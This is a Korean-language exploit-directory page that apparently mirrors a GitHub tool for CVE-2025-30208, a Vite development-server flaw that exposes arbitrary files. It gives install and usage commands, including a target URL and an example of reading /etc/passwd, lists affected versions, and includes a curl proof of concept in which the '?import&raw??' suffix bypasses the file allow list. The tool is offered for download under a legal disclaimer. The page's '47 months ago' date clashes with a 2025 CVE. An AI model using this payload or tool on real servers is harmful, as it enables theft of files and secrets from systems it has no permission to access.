Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-30208 — 이 익스플로잇은 교육 및 윤리적 보안 테스트 목적으로만 사용됩니다. 사전 상호 동의 없이 표적에 대해 이 익스플로잇을 사용하는 것은 불법이며, 개발자는 이 익스플로잇으로 인한 오용 또는 손해에 대해 어떠한 책임도 부인합니다. | Kitploit
도구/GitHubGitHub/on1onss/cve-2025-30208
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubon1onss/cve-2025-30208

CVE-2025-30208

이 익스플로잇은 교육 및 윤리적 보안 테스트 목적으로만 사용됩니다. 사전 상호 동의 없이 표적에 대해 이 익스플로잇을 사용하는 것은 불법이며, 개발자는 이 익스플로잇으로 인한 오용 또는 손해에 대해 어떠한 책임도 부인합니다.

저장소 보기
47개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-30208

[!IMPORTANT]

면책 조항

이 익스플로잇은 교육 및 윤리적 보안 테스트 목적으로만 제공됩니다. 사전 상호 동의 없이 대상을 공격하는 데 이 익스플로잇을 사용하는 것은 불법이며, 개발자는 이 익스플로잇으로 인한 오용 또는 피해에 대해 어떠한 책임도 지지 않습니다.

설치

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

사용법

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

설명

영향을 받는 버전

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

패치된 버전

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

요약

임의 파일의 내용이 브라우저로 반환될 수 있습니다.

영향

네트워크에 Vite 개발 서버를 명시적으로 노출하는(--host 또는 server.host 구성 옵션 사용) 앱만 영향을 받습니다.

세부 사항

@fs는 Vite 서빙 허용 목록 외부의 파일에 대한 액세스를 거부합니다. URL에 ?raw?? 또는 ?import&raw??를 추가하면 이 제한을 우회하여 파일이 존재할 경우 해당 파일의 내용을 반환합니다. 이 우회는 ?와 같은 후행 구분 기호가 여러 곳에서 제거되지만 쿼리 문자열 정규식에서는 고려되지 않기 때문에 존재합니다.

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

참조

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
도구 다운로드